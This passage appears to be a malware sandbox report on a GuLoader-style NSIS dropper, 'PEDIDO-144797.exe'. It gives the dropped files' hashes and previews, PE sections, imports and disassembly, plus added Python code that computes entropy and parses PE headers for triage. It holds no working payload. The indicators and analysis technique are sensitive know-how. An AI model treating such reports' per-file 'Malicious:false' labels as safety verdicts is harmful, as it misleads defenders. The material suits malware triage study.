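    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def is_pe(data: bytes) -> bool:
    """MZ header plus a 'PE\\0\\0' signature at e_lfanew (offset 0x3C): the check
    to apply when the magic label does not match the file's role."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def entropy_verdict(entropy: float) -> str:
    # Assumed thresholds: packed or encrypted payloads sit near 8 bits per byte;
    # zero-padded blobs (like the 1.3 MB drop above at 3.80 bits) sit well below
    # ordinary code and data.
    if entropy >= 7.2:
        return "packed-or-encrypted"
    if entropy < 4.5:
        return "sparse-or-padded"
    return "plain-code-or-data"


def file_metadata(data: bytes) -> dict:
    """Same fields the report prints, hashes upper-cased the way the report shows them."""
    ent = shannon_entropy(data)
    return {
        "size": len(data),
        "entropy": ent,
        "verdict": entropy_verdict(ent),
        "is_pe": is_pe(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


# Constructed inputs: a minimal MZ/PE header and a mostly-NUL blob.
def minimal_pe() -> bytes:
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)      # e_lfanew points just past the DOS header
    return bytes(hdr) + b"PE\0\0" + bytes(20)      # COFF header placeholder


def padded_blob(payload: bytes, total: int = 4096) -> bytes:
    """A small payload followed by NUL padding, like the low-entropy drop above."""
    return payload + bytes(total - len(payload))


if __name__ == "__main__":
    for name, blob in (("minimal PE", minimal_pe()),
                       ("padded blob", padded_blob(b"\x01\x02\x03\x04" * 16))):
        print(name, file_metadata(blob))
```

Run against the real dropped file, the hashes must match the report's MD5/SHA lines exactly; a mismatch means a different file was collected. The entropy verdict is a triage hint, not a classifier: GuLoader's encrypted payloads are high-entropy, but a padded container like this one can hide a small high-entropy region inside a low overall figure, so compute entropy per window when the overall number is low and the file is large.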
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):11776
                                                                                                                                        Entropy (8bit):5.659384359264642
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                                                                                                                        MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                                                                                                                        SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                                                                                                                        SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                                                                                                                        SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Joe Sandbox View:
• Filename: rpedido-002297.exe, Detection: malicious
• Filename: rpedido-002297.exe, Detection: malicious
• Filename: FACTURA-002297.exe, Detection: malicious
• Filename: FACTURA-002297.exe, Detection: malicious
• Filename: LisectAVT_2403002A_41.exe, Detection: malicious
• Filename: LisectAVT_2403002A_41.exe, Detection: malicious
• Filename: Inventory_list.img.exe, Detection: malicious
• Filename: Inventory_list.img.exe, Detection: malicious
• Filename: sF2s1EQU7T.exe, Detection: malicious
                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):195680
                                                                                                                                        Entropy (8bit):7.540352859140884
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:IDjEODVJUk6F2MnnHRmmMrpz65eXlpKF0Zo5Mj0IOsC8G5f4X:G/DTsRHd5eXlpA5Mjfg8GG
                                                                                                                                        MD5:9FD1449B3FE19BB534F0EB4492F90BCF
                                                                                                                                        SHA1:543398F96D8E44F2E6D84767EA7B63AFFF762CF4
                                                                                                                                        SHA-256:B4B4DD4D573FE0F78FADAD65AE104AEA7E7237414B0D7430691FE75D57243399
                                                                                                                                        SHA-512:BF74461BD40E2276170903A3D352A98C79EDB7F3DE1E1B2C220FAFFDBABD5744D3EF1DD2BBBA8C394F61937D9B6C477022CC54835F19D6CD84A554C7AFF2982A
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:low
                                                                                                                                        Preview:..T..DD................'.vvv..................=.P...??.......+....''''....a..d..%..........................ss........k...............BBB....B.....X........'.........K.!!.r..........b......................;;..................o......4...^^^.....J........EEE......''.vv.........pp........~.00...........AA......).........Y.....k...............``......nn.......{..ww._.........I.....XXXX......sss.....K...........nnn..........8........99999.......^...1.........O.......(...>....................cc..............I....G.....Z.-.........ii..................................*........CC..X.99.[..........x...........~~~.+++...%..LLL.............T...........+++............U...........v...........OOO..............DDDDDD......M.......t.u.22................J..S.6.....g...............zz...........E.......J..................*...M..-....0....j.eee.......................!!.<............c......:...........................................p...9................................................S....$$$.~~........4...
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):523
                                                                                                                                        Entropy (8bit):4.30492942039079
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:nGy3qcf5opzE6vCdgLMc/Uqv7FE7KRbqYUH6uN0u8vM:GEpxoy6adY/UqvZEwbql6uNh
                                                                                                                                        MD5:B33890A43FB0F38B6DDF18C5BCEFE234
                                                                                                                                        SHA1:80ED178A92C2B5CB530AEE4673FFC9011EBF86BB
                                                                                                                                        SHA-256:3BF02F982A76A4C896FDA78C1C4B2B730D690DD86475213DC415269D4629407B
                                                                                                                                        SHA-512:169E2D067337BF05BA08D615CE61B28CA4FD93D204966B3386FB4B373D9BACD689BEE3DDC5E04A4F19586E585263F62BC40B0944A10E5867C63C9C7236A5CC48
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:clisiocampa percussing acronyctous petitesses pilgrimsrejser zygosphene miasmology konkyljens..labelable kraftls veneries symbolically duncan sulemadens,logopdisk genuinenesses pseudoinspirational bekenderen.franciscanism krftcellers drylots toksikologiskes rottegiftes impecuniary slisken autokratiets hjertebaandet banegaardsbygningen choenix..adrenocorticotropic mangfoldigheders avisudvikling ekstremitetens skamsloges nrede unpersuasion trachling tvrformatets..negerbolle suppressionen lustful bagels flamenco selrets,
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):454032
                                                                                                                                        Entropy (8bit):2.653031104800933
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:zjFc1Ku+6ADOlig8DEq4a/LERvjSJCphiN5zCPS63cNg6KW0E5hF/vnYXW2ngfMl:i1vAd6BqP0oheUCH3uK4DEEEhH
                                                                                                                                        MD5:0C22814BB5A9B974CE322212EF915A81
                                                                                                                                        SHA1:5B0BB3F2F3BA28D3026A9C0528A91E533993A5AD
                                                                                                                                        SHA-256:2C2E91A87B41D74F121D2EA5D92BFBA0C802028F297E32894C34A3DFB28FDC3A
                                                                                                                                        SHA-512:8A6DB227CEDEB8862910DEFCC64378BD0DE5C6A7EA9479E6BFC02419FF4883F15DE4F5560232196041CF732A3EFFE5E8AE2E7BEF1E7E0FB2CA3209C7AB07C769
                                                                                                                                        Malicious:false
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):276551
                                                                                                                                        Entropy (8bit):1.2459972317120458
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:768:q5eLWls2nEEvz9mAEPesDf7zRhfRKrtTgtOnumyYJBW+JAILJcqhOzwnasNP2r2J:q86nLDJnJuki2BaFsfRz
                                                                                                                                        MD5:0071DC51C79F0655F0BB77074D56B1D7
                                                                                                                                        SHA1:9617AE1434B07532BAAF39D69CF720C05B85E8F9
                                                                                                                                        SHA-256:0628FA8F44795D79D5B855E8387985E04D134E8B57FE4D57E663FBAED278DF89
                                                                                                                                        SHA-512:E2149E9F3B18DCB50E49EC51226D7A6BF3969E119B385410E80E431024B25A938C965C743D80C0C1D8A3820D0DDDA14464CAC75F73AE22F259B447264F8431BA
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:........................................................#..................................................................................E........R...............................]......................W...\......O.........................................$9......4.............................;..........X........................Z........"..............................................................................;..........U.....................^.....................l.......................3...................~............u.........................................e......P..................................H..............................................................................2.........2.................>....................................................................................................................+.......z....................A..$.........................................................................................]........?..............................
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):398154
                                                                                                                                        Entropy (8bit):1.2543435533086644
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:8IfJmHKeJzuGrd0myk0Ek5rFnJd62xZ9WEmaslkcO:8omHKAJR0T8axr
                                                                                                                                        MD5:7BA8E260D6477B4FD16DAE2D14EA4482
                                                                                                                                        SHA1:16873CB5BFBA899D4ED937603AA9980F119695D6
                                                                                                                                        SHA-256:C19F7B3F1A20E1529113EE69AA53DB6E124A51F03098E6FB6AF0E76037C85B8B
                                                                                                                                        SHA-512:ECAA786515C73B08A44C22FD48B205166611750EC633849823A88BBF95A675CA29FB7F22E652EFCFC055FC92F8381FC6276F4B732F91612A2385BF670131FFF2
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:...................z...................................................1........................................T.......r...........................'......................O..................|......P.................................0.....................................).......................l.............S..^......Z.........E.................................{.....................................................................................................................................................................$...........*................................................D........y....................................0..........|........m............................G.............Q...........>...s.......C...................................................".....................................................................+.......................L...6.......................................................................`.................................k.....................
                                                                                                                                        Process:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):37
                                                                                                                                        Entropy (8bit):4.046762824854522
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:lgov8fOMy:XHB
                                                                                                                                        MD5:CFDA8E6AADE7958F94A959BDB29CB209
                                                                                                                                        SHA1:59C459E105A7AF33D13A365F735E3CB7B8E5DDB0
                                                                                                                                        SHA-256:B4543E8AB4997934D2EDC7DE8A76A24B7C2CCB641212AE3B9B17FE05B71D3E87
                                                                                                                                        SHA-512:EDFDCA00667ED3A5558F7E614373F0B8393763A979154666972C659CB44E75CCD51170E4E2189043046EB4DDB8A68642BBDB6F98A0E494E76E86FAAF14F993B2
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:[xanthippe]..sikkerhedsgraden=preve..
                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                        Entropy (8bit):7.21740383078352
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                        File name:PEDIDO-144797.exe
                                                                                                                                        File size:567'544 bytes
                                                                                                                                        MD5:2c5483106fe248cced82541b91cba20e
                                                                                                                                        SHA1:41e69017b26287ee7814bb35a967672ba58cb714
                                                                                                                                        SHA256:2702bb251c14965787b39f03a9c41000b9b0421528578e5a6a221ad8b27f182d
                                                                                                                                        SHA512:4ca40026e8dc3da75c7e68334d268d5b08f568259e597af1fabbd1586f4aaf05c716e17d0bf4c88b68f765fab6ead6965afd73ecb0ead8b97d3ea1fd55d60130
                                                                                                                                        SSDEEP:12288:4aqrw9z7Or5X16gS7U5XzJocC/Uisrk9qKyzpqK:5Kw9zar5lxYUtz2cC/lqVpqK
                                                                                                                                        TLSH:10C4DFAB2DD2CDEEC40746708AA5B5B1A6F2ACF187039A0367733BF92D32D514F06615
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.....
                                                                                                                                        Icon Hash:5ce633391c1c0601
                                                                                                                                        Entrypoint:0x403489
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:true
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                        Time Stamp:0x5975952E [Mon Jul 24 06:35:26 2017 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:
                                                                                                                                        OS Version Major:4
                                                                                                                                        OS Version Minor:0
                                                                                                                                        File Version Major:4
                                                                                                                                        File Version Minor:0
                                                                                                                                        Subsystem Version Major:4
                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                        Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                                                                        Signature Valid:false
                                                                                                                                        Signature Issuer:CN="binmen Aerophile ", E=Figurer@Midnoon.Fu, L=Whipsnade, S=England, C=GB
                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                        Error Number:-2146762487
                                                                                                                                        Not Before, Not After
                                                                                                                                        • 08/05/2024 04:06:26 08/05/2027 04:06:26
                                                                                                                                        Subject Chain
                                                                                                                                        • CN="binmen Aerophile ", E=Figurer@Midnoon.Fu, L=Whipsnade, S=England, C=GB
                                                                                                                                        Version:3
                                                                                                                                        Thumbprint MD5:0B03CA7D5DFCDE8AC658D359B709A77C
                                                                                                                                        Thumbprint SHA-1:CCFFE8D8D5AAF536F8CD668FDBB76A2488B69D94
                                                                                                                                        Thumbprint SHA-256:4DE3D0A9755FF738FBB9D2F8683E6BCE15FB17DC42E63D71418B53798A25E6A4
                                                                                                                                        Serial:5C78EE42FBFBCE805443558BFD04290950A90037
                                                                                                                                        Instruction
                                                                                                                                        sub esp, 000002D4h
                                                                                                                                        push ebx
                                                                                                                                        push esi
                                                                                                                                        push edi
                                                                                                                                        push 00000020h
                                                                                                                                        pop edi
                                                                                                                                        xor ebx, ebx
                                                                                                                                        push 00008001h
                                                                                                                                        mov dword ptr [esp+14h], ebx
                                                                                                                                        mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080ACh]
call dword ptr [004080A8h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A24Ch], eax
je 00007F72CCAD0743h
push ebx
call 00007F72CCAD39F1h
cmp eax, ebx
je 00007F72CCAD0739h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F72CCAD396Bh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F72CCAD071Ch
push 0000000Ah
call 00007F72CCAD39C4h
push 00000008h
call 00007F72CCAD39BDh
push 00000006h
mov dword ptr [0042A244h], eax
call 00007F72CCAD39B1h
cmp eax, ebx
je 00007F72CCAD0741h
push 0000001Eh
call eax
test eax, eax
je 00007F72CCAD0739h
or byte ptr [0042A24Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A318h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x57000 | 0x220b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x89608 | 0x12f0
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x63d1 | 0x6400 | 139645791b76bd6f7b8c4472edbbdfe5 | False | 0.66515625 | data | 6.479451209065 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x138e | 0x1400 | 007eff248f0493620a3fd3f7cadc755b | False | 0.45 | data | 5.143831732151552 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20358 | 0x600 | ec5bcec782f43a3fb7e8dfbe0d0db4db | False | 0.501953125 | data | 4.000739070159718 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x2c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x57000 | 0x220b8 | 0x22200 | 30cc4d5ad2d805f600d8d9358a38829a | False | 0.1827066163003663 | data | 2.9689436080399076 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
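The two tables above (data directories and sections) are the kind of thing worth recomputing from your own copy of a sample rather than trusting a report blindly: per-section MD5 and entropy are what you pivot on, and the blank "Is in Section" cell for IMAGE_DIRECTORY_ENTRY_SECURITY is not a gap but a property of the format, since that entry holds a raw file offset to the Authenticode table rather than an RVA. The following is an added example, not Joe Sandbox code and not code from the sample: a stdlib-only PE32/PE32+ header walker that reproduces those columns (RVA, size, containing section, MD5, Shannon entropy, zlib ratio, characteristics) and reads the WIN_CERTIFICATE header the SECURITY entry points at. It runs on a constructed two-section fixture built in `build_sample_pe()`; the layout constants in that fixture are assumptions for the test, and on a real file you would call `parse_pe(open(path, "rb").read())` instead.

```python
# Added example (not Joe Sandbox code): stdlib-only PE header walker that
# reproduces the data-directory and section columns of a sandbox report and
# sanity-checks the IMAGE_DIRECTORY_ENTRY_SECURITY (Authenticode) table.
# The PE it runs on is a constructed fixture, not the analysed sample.
import hashlib
import math
import struct
import zlib
from collections import Counter

DIRECTORY_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY",
                   "BASERELOC", "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS",
                   "LOAD_CONFIG", "BOUND_IMPORT", "IAT", "DELAY_IMPORT",
                   "COM_DESCRIPTOR", "RESERVED"]
SECURITY = 4  # the one directory whose 'VirtualAddress' is a file offset, not an RVA
SECTION_FLAGS = {0x20: "IMAGE_SCN_CNT_CODE", 0x40: "IMAGE_SCN_CNT_INITIALIZED_DATA",
                 0x80: "IMAGE_SCN_CNT_UNINITIALIZED_DATA", 0x20000000: "IMAGE_SCN_MEM_EXECUTE",
                 0x40000000: "IMAGE_SCN_MEM_READ", 0x80000000: "IMAGE_SCN_MEM_WRITE"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 8.0 for uniform data, 0.0 for constant or empty data."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def zlib_ratio(data: bytes) -> float:
    """compressed/raw size (the report's 'ZLIB Complexity'); 0.0 for an empty section."""
    return len(zlib.compress(data)) / len(data) if data else 0.0


def section_for_rva(sections: list, rva: int):
    for s in sections:
        span = max(s["virtual_size"], s["raw_size"])
        if s["virtual_address"] <= rva < s["virtual_address"] + span:
            return s["name"]
    return None


def parse_pe(blob: bytes) -> dict:
    if blob[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, e_lfanew + 4)
    opt_off = e_lfanew + 24
    magic = struct.unpack_from("<H", blob, opt_off)[0]
    # Directories start at +96 (PE32) or +112 (PE32+); NumberOfRvaAndSizes is the DWORD before.
    dir_off = opt_off + (96 if magic == 0x10B else 112)
    ndirs = min(struct.unpack_from("<I", blob, dir_off - 4)[0], 16)

    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", blob, opt_off + opt_size + 40 * i)
        raw = blob[rawptr:rawptr + rawsize]  # raw bytes only; .ndata-style sections hash as empty
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": va, "virtual_size": vsize, "raw_size": rawsize,
                         "md5": hashlib.md5(raw).hexdigest(),
                         "entropy": shannon_entropy(raw), "zlib_complexity": zlib_ratio(raw),
                         "characteristics": [n for bit, n in SECTION_FLAGS.items() if flags & bit]})

    directories = []
    for i in range(ndirs):
        rva, size = struct.unpack_from("<II", blob, dir_off + 8 * i)
        in_section = section_for_rva(sections, rva) if size and i != SECURITY else None
        directories.append({"name": DIRECTORY_NAMES[i], "virtual_address": rva, "size": size,
                            "section": in_section, "is_file_offset": i == SECURITY})
    return {"machine": machine, "directories": directories, "sections": sections}


def check_certificate_table(blob: bytes, pe: dict) -> dict:
    """Read the WIN_CERTIFICATE header the SECURITY entry points at. A dwLength that
    disagrees with the directory size, a revision other than 0x0200, or a table that
    does not end at EOF is rejected by verifiers before the PKCS#7 blob is even parsed."""
    if len(pe["directories"]) <= SECURITY or not pe["directories"][SECURITY]["size"]:
        return {"present": False}
    off, size = pe["directories"][SECURITY]["virtual_address"], pe["directories"][SECURITY]["size"]
    dw_length, revision, cert_type = struct.unpack_from("<IHH", blob, off)
    return {"present": True, "length_matches": dw_length == size, "revision": revision,
            "type": cert_type, "at_eof": off + size == len(blob)}


def build_sample_pe() -> bytes:
    """Constructed PE32 fixture (assumed layout): .text holds every byte value twice,
    .rdata is zeros and hosts the import table and IAT, and a 256-byte certificate
    table sits at the end of the file."""
    text = bytes(range(256)) * 2
    rdata = b"\0" * 0x200
    cert = struct.pack("<IHH", 0x100, 0x0200, 0x0002) + b"\xAA" * (0x100 - 8)
    dirs = [(0, 0)] * 16
    dirs[1], dirs[SECURITY], dirs[12] = (0x2010, 0x28), (0x600, 0x100), (0x2000, 0x10)
    opt = struct.pack("<HBBIIIIII", 0x10B, 6, 0, 0x200, 0x200, 0, 0x1000, 0x1000, 0x2000)
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII", 0x400000, 0x1000, 0x200, 4, 0, 0, 0, 4, 0,
                       0, 0x3000, 0x200, 0, 2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x0102)
    secs = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    secs += struct.pack("<8sIIIIIIHHI", b".rdata", 0x200, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0x40000040)
    headers = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0" + coff + opt + secs
    return headers.ljust(0x200, b"\0") + text + rdata + cert


if __name__ == "__main__":
    blob = build_sample_pe()
    pe = parse_pe(blob)
    for d in pe["directories"]:
        print(f"IMAGE_DIRECTORY_ENTRY_{d['name']:<15} {d['virtual_address']:#8x} {d['size']:#6x} {d['section'] or ''}")
    for s in pe["sections"]:
        print(s["name"], s["md5"], f"{s['entropy']:.3f}", f"{s['zlib_complexity']:.3f}",
              ", ".join(s["characteristics"]))
    print(check_certificate_table(blob, pe))
```

Two details carry over directly to the real sample: a section whose raw size is 0 (like .ndata above) hashes to the empty-input MD5 d41d8cd98f00b204e9800998ecf8427e with entropy 0, and the SECURITY entry must be read as a file offset, which is why `section_for_rva` is skipped for it.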
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x572c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.14975452502070272
RT_ICON | 0x67af0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States | 0.18344019339920117
RT_ICON | 0x70f98 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.21953235710911667
RT_ICON | 0x751c0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.2731327800829875
RT_ICON | 0x77768 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.3428705440900563
RT_DIALOG | 0x78810 | 0x120 | data | English | United States | 0.5138888888888888
RT_DIALOG | 0x78930 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x78a50 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x78b18 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x78b78 | 0x4c | data | English | United States | 0.8026315789473685
RT_VERSION | 0x78bc8 | 0x1b0 | data | English | United States | 0.5601851851851852
RT_MANIFEST | 0x78d78 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
KERNEL32.dll | ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
